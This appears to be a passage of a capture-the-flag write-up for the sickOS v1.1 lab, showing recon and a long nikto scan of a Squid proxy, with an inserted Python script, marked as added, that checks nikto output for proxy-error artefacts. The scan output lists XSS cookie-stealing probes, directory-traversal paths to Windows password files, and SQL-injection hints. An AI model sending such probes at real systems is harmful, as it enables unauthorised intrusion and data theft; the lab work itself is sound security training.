sickOS v1.1

Prateek Sarangi
108 min read · Oct 30, 2021


Okay, so before starting this one, according to the author of this machine, this one is very close to the type of machine he got in his OSCP. So it was actually a bit tricky as compared to the others that I had done so far.

With that in mind, let’s start.

arp-scan

The IP Address for the machine is 192.168.162.129

Nmap Scan

Here we go again,

So we find that ports 22, 3128 and 8080 are open. Well, from the long (well, not that long) history of vulnerabilities, we are safe to assume that maybe port 22 won't be vulnerable. So let's start with ports 3128 and 8080, and if neither of them works, we can always come back and check out port 22.

Spoiler alert: we didn't have to!!

Nikto Scan

Here I actually made the mistake of going down a rabbit hole. The nmap scan clearly showed us that the URL request returned an error, but I kind of neglected it and spent a lot of the following day searching for a VPN which might work on the request URL. Damn, I was so wrong!!
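The same error shows up in the first lines of the nikto output further down (the squid banner, the x-squid-error header, and an HTML fragment reported as a robots.txt entry). As an added example, not part of the original write-up, here is a small triage script that reads nikto output and reports the signs that the findings came from a proxy error page rather than a web application; the function names, the extension table and the threshold of three technology families are assumptions of this example.

```python
import re
from collections import Counter

# Excerpt of the nikto output on this page (some messages shortened), embedded
# so the script runs offline.
SAMPLE = """\
+ Server: squid/3.1.19
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ Entry '<li><p>Illegal character in hostname; underscores are not ed.</p></li>' in robots.txt returned a non-forbidden or redirect HTTP code (400)
+ /scripts/iisadmin/ism.dll: Allows you to mount a brute force attack on passwords
+ /cfdocs/expeval/openfile.cfm: Can use to expose the system/server path.
+ /nsn/..%5Cutil/dir.bas: Netbase util access is possible
+ OSVDB-4907: /vgn/license: Vignette server license file found.
+ /typo3conf/localconf.php: TYPO3 config file found.
"""

SERVER_RE = re.compile(r"^\+ Server: (.*)$")
HEADER_RE = re.compile(r"^\+ Uncommon header '([^']+)' found, with contents: (.*)$")
ROBOTS_RE = re.compile(r"^\+ Entry '(.*)' in robots\.txt returned .*\((\d{3})\)$")
FINDING_RE = re.compile(r"^\+ (?:(OSVDB-\d+): )?(/\S*?): (.*)$")

# Assumption of this example: a rough mapping from file extension to the
# technology stack a finding implies. It is a heuristic, not a nikto feature.
FAMILIES = {
    "IIS/Windows": (".asp", ".dll", ".exe", ".htr", ".idc"),
    "ColdFusion": (".cfm",),
    "Java": (".jsp",),
    "PHP": (".php", ".php3"),
    "Novell .bas scripts": (".bas",),
}


def parse_nikto(text):
    """Split nikto text output into banner, headers, robots entries and findings."""
    report = {"server": None, "headers": {}, "robots": [], "findings": []}
    for line in text.splitlines():
        line = line.strip()
        if m := SERVER_RE.match(line):
            report["server"] = m.group(1)
        elif m := HEADER_RE.match(line):
            report["headers"][m.group(1).lower()] = m.group(2)
        elif m := ROBOTS_RE.match(line):
            report["robots"].append((m.group(1), int(m.group(2))))
        elif m := FINDING_RE.match(line):
            report["findings"].append(
                {"id": m.group(1), "path": m.group(2), "msg": m.group(3)}
            )
    return report


def family_of(path):
    """Return the technology family implied by a path's extension, or None."""
    base = path.split("?", 1)[0].lower()
    for name, exts in FAMILIES.items():
        if base.endswith(exts):
            return name
    return None


def stack_families(report):
    """Count findings per implied technology family."""
    return Counter(f for f in (family_of(x["path"]) for x in report["findings"]) if f)


def reliability_signals(report, min_families=3):
    """List the reasons the path findings in this report should not be trusted."""
    signals = []
    # The responder identifies itself as a proxy, not an origin web server.
    if report["server"] and report["server"].lower().startswith("squid"):
        signals.append("proxy-banner")
    # Squid marks its own generated error pages with this header.
    if "x-squid-error" in report["headers"]:
        signals.append("proxy-error-header")
    # A robots.txt "entry" containing markup means an error page was parsed.
    if any(re.search(r"<[a-z]+>", entry, re.I) for entry, _ in report["robots"]):
        signals.append("html-in-robots")
    # One host rarely runs IIS, ColdFusion, PHP and Novell scripts at once;
    # that mix is typical of a target answering every path the same way.
    if len(stack_families(report)) >= min_families:
        signals.append("mixed-stacks")
    return signals


if __name__ == "__main__":
    parsed = parse_nikto(SAMPLE)
    print("server:", parsed["server"])
    print("findings:", len(parsed["findings"]), dict(stack_families(parsed)))
    print("signals:", reliability_signals(parsed))
```
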

So let’s start with the nikto scan result, it’s very long by the way…

$ nikto -h http://192.168.162.129:3128

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.162.129
+ Target Hostname: 192.168.162.129
+ Target Port: 3128
+ Start Time: 2021-10-24 02:39:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: squid/3.1.19
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ Uncommon header 'x-cache-lookup' found, with contents: NONE from localhost:3128
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '<li><p>Illegal character in hostname; underscores are not ed.</p></li>' in robots.txt returned a non-forbidden or redirect HTTP code (400)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ /kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php
+ /lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ /ssdefs/: Siteseed pre 1.4.2 has 'major' security problems.
+ /sshome/: Siteseed pre 1.4.2 has 'major' security problems.
+ /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
+ /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
+ /scripts/samples/details.idc: See RFP 9901; www.wiretrip.net
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ /cgi-bin/wrap: comes with IRIX 6.2; allows to view directories
+ /forums//admin/config.php: PHP Config file may contain database IDs and passwords.
+ /forums//adm/config.php: PHP Config file may contain database IDs and passwords.
+ /forums//administrator/config.php: PHP Config file may contain database IDs and passwords.
+ /forums/config.php: PHP Config file may contain database IDs and passwords.
+ /guestbook/guestbookdat: PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.
+ /guestbook/pwd: PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.
+ /help/: Help directory should not be accessible
+ OSVDB-2411: /hola/admin/cms/htmltags.php?datei=./sec/data.php: hola-cms-1.2.9-10 may reveal the administrator ID and password.
+ OSVDB-8103: /global.inc: PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php
+ OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ OSVDB-59618: /inc/dbase.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ OSVDB-2703: /geeklog/users.php: Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.
+ OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
+ /guestbook/admin.php: Guestbook admin page available without authentication.
+ /getaccess: This may be an indication that the server is running getAccess for SSO
+ /cfdocs/expeval/openfile.cfm: Can use to expose the system/server path.
+ /tsweb/: Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html
+ /vgn/performance/TMT: Vignette CMS admin/maintenance script available.
+ /vgn/performance/TMT/Report: Vignette CMS admin/maintenance script available.
+ /vgn/performance/TMT/Report/XML: Vignette CMS admin/maintenance script available.
+ /vgn/performance/TMT/reset: Vignette CMS admin/maintenance script available.
+ /vgn/ppstats: Vignette CMS admin/maintenance script available.
+ /vgn/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/record/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/stylepreviewer: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Deleting: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Saving: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Select: Vignette CMS admin/maintenance script available.
+ /scripts/iisadmin/bdir.htr: This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dirs> . https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/MS02-028. http://www.cert.org/advisories/CA-2002-09.html.
+ /scripts/iisadmin/ism.dll: Allows you to mount a brute force attack on passwords
+ /scripts/tools/ctss.idc: This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.
+ /bigconf.cgi: BigIP Configuration CGI
+ /blah_badfile.shtml: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.
+ OSVDB-4910: /vgn/style: Vignette server may reveal system information through this file.
+ OSVDB-17653: /SiteServer/Admin/commerce/foundation/domain.asp: Displays known domains of which that server is involved.
+ OSVDB-17654: /SiteServer/Admin/commerce/foundation/driver.asp: Displays a list of installed ODBC drivers.
+ OSVDB-17655: /SiteServer/Admin/commerce/foundation/DSN.asp: Displays all DSNs configured for selected ODBC drivers.
+ OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
+ /SiteServer/Admin/knowledge/dsmgr/default.asp: Used to view current search catalog configurations
+ /basilix/mbox-list.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page
+ /basilix/message-read.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page
+ /clusterframe.jsp: Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
+ /IlohaMail/blank.html: IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
+ /bb-dnbd/faxsurvey: This may allow arbitrary command execution.
+ /cartcart.cgi: If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.
+ OSVDB-6591: /scripts/Carello/Carello.dll: Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.
+ /scripts/tools/dsnform.exe: Allows creation of ODBC Data Source
+ /scripts/tools/dsnform: Allows creation of ODBC Data Source
+ OSVDB-17656: /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
+ OSVDB-17657: /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
+ /prd.i/pgen/: Has MS Merchant Server 1.0
+ /readme.eml: Remote server may be infected with the Nimda virus.
+ /scripts/httpodbc.dll: Possible IIS backdoor found.
+ /scripts/proxy/w3proxy.dll: MSProxy v1.0 installed
+ /SiteServer/admin/: Site Server components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm
+ /siteseed/: Siteseed pre 1.4.2 has 'major' security problems.
+ /pccsmysqladm/incs/dbconnect.inc: This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
+ /PDG_Cart/oder.log: Shopping cart software log
+ /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
+ /view_source.jsp: Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.
+ /w-agora/: w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.
+ OSVDB-42680: /vider.php3: MySimpleNews may allow deleting of news items without authentication.
+ OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
+ /pbserver/pbserver.dll: This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-094.asp
+ /administrator/gallery/uploadimage.php: Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.
+ /pafiledb/includes/team/file.php: paFileDB 3.1 and below may allow file upload without authentication.
+ /phpEventCalendar/file_upload.php: phpEventCalendar 1.1 and prior are vulnerable to file upload bug.
+ /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
+ /scripts/cpshost.dll: Posting acceptor possibly allows you to upload files
+ /upload.asp: An ASP page that allows attackers to upload files to server
+ /uploadn.asp: An ASP page that allows attackers to upload files to server
+ /uploadx.asp: An ASP page that allows attackers to upload files to server
+ /wa.exe: An ASP page that allows attackers to upload files to server
+ /basilix/compose-attach.php3: BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads
+ /server/: Possibly Macromedia JRun or CRX WebDAV upload
+ /vgn/ac/data: Vignette CMS admin/maintenance script available.
+ /vgn/ac/delete: Vignette CMS admin/maintenance script available.
+ /vgn/ac/edit: Vignette CMS admin/maintenance script available.
+ /vgn/ac/esave: Vignette CMS admin/maintenance script available.
+ /vgn/ac/fsave: Vignette CMS admin/maintenance script available.
+ /vgn/ac/index: Vignette CMS admin/maintenance script available.
+ /vgn/asp/MetaDataUpdate: Vignette CMS admin/maintenance script available.
+ /vgn/asp/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/asp/status: Vignette CMS admin/maintenance script available.
+ /vgn/asp/style: Vignette CMS admin/maintenance script available.
+ /vgn/errors: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/controller: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/errorpage: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/initialize: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/jspstatus: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/jspstatus56: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/metadataupdate: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/style: Vignette CMS admin/maintenance script available.
+ /vgn/legacy/edit: Vignette CMS admin/maintenance script available.
+ /vgn/login: Vignette server may allow user enumeration based on the login attempts to this file.
+ OSVDB-35707: /forum/admin/wwforum.mdb: Web Wiz Forums password database found.
+ /fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-52975: /guestbook/admin/o12guest.mdb: Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.
+ OSVDB-15971: /midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
+ OSVDB-15971: /MIDICART/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
+ OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
+ /news/news.mdb: Web Wiz Site News release v3.06 admin password database is available and unencrypted.
+ OSVDB-53413: /shopping300.mdb: VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.
+ OSVDB-53413: /shopping400.mdb: VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.
+ OSVDB-15971: /shoppingdirectory/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
+ OSVDB-4398: /database/db2000.mdb: Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.
+ /admin/config.php: PHP Config file may contain database IDs and passwords.
+ /adm/config.php: PHP Config file may contain database IDs and passwords.
+ /administrator/config.php: PHP Config file may contain database IDs and passwords.
+ /contents.php?new_language=elvish&mode=select: Requesting a file with an invalid language selection from DC Portal may reveal the system path.
+ OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
+ /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.
+ /shopa_sessionlist.asp: VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.
+ OSVDB-53303: /simplebbs/users/users.php: Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.
+ /typo3conf/: This may contain sensitive TYPO3 files.
+ /cms/typo3conf/: This may contain sensitive TYPO3 files.
+ /site/typo3conf/: This may contain sensitive TYPO3 files.
+ /typo/typo3conf/: This may contain sensitive TYPO3 files.
+ /typo3/typo3conf/: This may contain sensitive TYPO3 files.
+ /typo3conf/database.sql: TYPO3 SQL file found.
+ /cms/typo3conf/database.sql: TYPO3 SQL file found.
+ /site/typo3conf/database.sql: TYPO3 SQL file found.
+ /typo/typo3conf/database.sql: TYPO3 SQL file found.
+ /typo3/typo3conf/database.sql: TYPO3 SQL file found.
+ /typo3conf/localconf.php: TYPO3 config file found.
+ /cms/typo3conf/localconf.php: TYPO3 config file found.
+ /site/typo3conf/localconf.php: TYPO3 config file found.
+ /typo/typo3conf/localconf.php: TYPO3 config file found.
+ /typo3/typo3conf/localconf.php: TYPO3 config file found.
+ OSVDB-53386: /vchat/msg.txt: VChat allows user information to be retrieved.
+ OSVDB-4907: /vgn/license: Vignette server license file found.
+ /webcart-lite/config/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /webcart-lite/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /webcart/carts/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
+ /webcart/config/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
+ /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /webcart/orders/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
+ /webcart/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /ws_ftp.ini: Can contain saved passwords for FTP sites
+ /WS_FTP.ini: Can contain saved passwords for FTP sites
+ /_mem_bin/auoconfig.asp: Displays the default AUO (LDAP) schema, including host and port.
+ OSVDB-17659: /SiteServer/Admin/knowledge/persmbr/vs.asp: Expose various LDAP service and backend configuration parameters
+ OSVDB-17661: /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp: Expose various LDAP service and backend configuration parameters
+ OSVDB-17662: /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp: Expose various LDAP service and backend configuration parameters
+ OSVDB-17660: /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp: Expose various LDAP service and backend configuration parameters
+ /tvcs/getservers.exe?action=selects1: Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.
+ /whatever.htr: May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/MS02-018)
+ /nsn/fdir.bas:ShowVolume: You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in
+ /forum/admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
+ /jamdb/: JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.
+ OSVDB-1201: /cgi/cgiproc?: It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.
+ OSVDB-6196: /servlet/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
+ /servlet/sunexamples.BBoardServlet: This default servlet lets attackers execute arbitrary commands.
+ OSVDB-6196: /servlets/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
+ /perl/-e%20print%20Hello: The Perl interpreter on the Novell system may allow any command to be executed. See http://www.securityfocus.com/bid/5520. Installing Perl 5.6 might fix this issue.
+ /vgn/legacy/save: Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.
+ /IDSWebApp/IDSjsp/Login.jsp: Tivoli Directory Server Web Administration.
+ OSVDB-6466: /quikstore.cfg: Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt
+ /quikstore.cgi: A shopping cart.
+ /securecontrolpanel/: Web Server Control Panel
+ /siteminder: This may be an indication that the server is running Siteminder for SSO
+ /webmail/: Web based mail package installed.
+ /_cti_pvt/: FrontPage directory found.
+ /smg_Smxcfg30.exe?vcc=3560121183d3: This may be a Trend Micro Officescan 'backdoor'.
+ /nsn/..%5Cutil/attrib.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/chkvol.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/copy.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/del.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/dir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/dsbrowse.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/glist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/lancard.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/md.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/rd.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/ren.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/send.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/set.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/slist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/type.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/userlist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cweb/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cweb/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cwebdemo/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cwebdemo/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /upd/: WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /CVS/Entries: CVS Entries file may contain directory listing information.
+ OSVDB-8450: /3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-31150: /LOGIN.PWD: MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.
+ OSVDB-31150: /USER/CONFIG.AP: MIPCD configuration information. MIPCD should not have the web interface enabled.
+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
+ /cgi-bin/cgi_process: WASD reveals a lot of system information in this script. It should be removed.
+ /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /examples/servlet/AUX: Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.
+ /Config1.htm: This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.
+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/MS02-018 for details.
+ /WebAdmin.dll?View=Logon: Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.
+ /cgi-win/cgitest.exe: This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details. Remove this default CGI.
+ /cgi-shl/win-c-sample.exe: win-c-sample.exe has a buffer overflow
+ /.nsf/../winnt/win.ini: This win.ini file can be downloaded.
+ /................../config.sys: PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.
+ /../../../../winnt/repair/sam._: Sam backup successfully retrieved.
+ /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
+ OSVDB-728: /admentor/adminadmin.asp: Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =
+ OSVDB-36894: /My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /postnuke/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /postnuke/html/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /modules/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /phpBB/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /forum/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2767: /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>: OpenAutoClassifieds 1.0 is vulnerable to a XSS attack
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
